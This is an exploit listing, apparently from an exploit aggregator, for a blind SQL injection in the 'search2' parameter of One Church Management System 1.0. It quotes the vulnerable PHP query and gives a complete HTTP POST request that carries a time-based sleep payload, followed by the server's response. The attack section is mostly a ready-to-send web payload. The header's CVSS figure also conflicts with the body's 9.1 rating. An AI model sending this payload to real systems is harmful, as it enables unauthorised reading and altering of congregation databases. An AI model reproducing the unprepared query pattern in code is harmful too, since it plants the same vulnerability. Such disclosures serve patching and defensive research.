Exploit for One Church Management System 1.0 SQL Injection

Name: Exploit for One Church Management System 1.0 SQL Injection
Rating: 5 (78 reviews)
2022-03-26 | CVSS 0.3
## https://sploitus.com/exploit?id=PACKETSTORM:166463
# Exploit Title: One Church Management System 1.0 - attendancy.php  
(search2) SQL Injection  
# Date: 18/03/2022  
# Exploit Author: Mr Empy  
# Software Link:  
https://www.sourcecodester.com/php/15225/church-management-software-free-download-full-version.html  
# Version: 1.0  
# Tested on: Linux  
  
  
Title:  
================  
One Church Management System 1.0 - attendancy.php (search2) SQL Injection  
  
  
Summary:  
================  
The One Church Management System suffers from a Structured Query Language  
(SQL) injection vulnerability because of the lack of query preparation with  
the PDO module. This allows an attacker to query the database, breaking  
confidentiality and integrity.  
  
88. if(isset($_POST['search2'])&& !empty($_POST['search2'])){  
89. $search2 = $_POST['search2'];  
90. $sql="SELECT  
tblchristian.ID,tblchristian.Name,tblchristian.Sex,tblchristian.Age,tblchristian.Occupation,tblchristian.District,tblchristian.Village,tblchristian.Phone  
from tblchristian where Code = '$search2'";  
91. $query = $dbh -> prepare($sql);  
92. $query->execute();  
93. $results=$query->fetchAll(PDO::FETCH_OBJ);  
94. $cnt=1;  
  
  
Severity Level:  
================  
9.1 (Critical)  
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N  
  
  
Affected Product:  
================  
One Church Management System v1.0  
  
  
Steps to Reproduce:  
================  
  
1. Open a request repeater (like Burp Suite) and send this request:  
  
POST /one_church/attendancy.php HTTP/1.1  
Host: target.com  
Content-Length: 102  
Cache-Control: max-age=0  
Upgrade-Insecure-Requests: 1  
Origin: http://target.com  
Content-Type: application/x-www-form-urlencoded  
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like  
Gecko) Chrome/95.0.4638.69 Safari/537.36  
Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Referer: http://target.com/one_church/attendancy.php  
Accept-Encoding: gzip, deflate  
Accept-Language: pt-PT,pt;q=0.9,en-US;q=0.8,en;q=0.7  
Connection: close  
  
search2=%27+and+%28select+*+from%28select%28sleep%2810%29%29%29Avx%29+and+%27abc%27+%3D+%27abc&search=  
  
In the search2 parameter I injected a SQL blind payload: ' and (select *  
from(select(sleep(10)))Avx) and 'abc' = 'abc  
  
Reponse:  
  
HTTP/1.1 302 Found  
Date: Fri, 18 Mar 2022 14:02:51 GMT  
Server: Apache/2.4.52  
Set-Cookie: PHPSESSID=2fdb771gp041gnuphtglv608b1; path=/  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: no-store, no-cache, must-revalidate  
Pragma: no-cache  
Location: http://target.com/one_church/index.php  
Connection: close  
Content-Type: text/html; charset=UTF-8  
Content-Length: 14927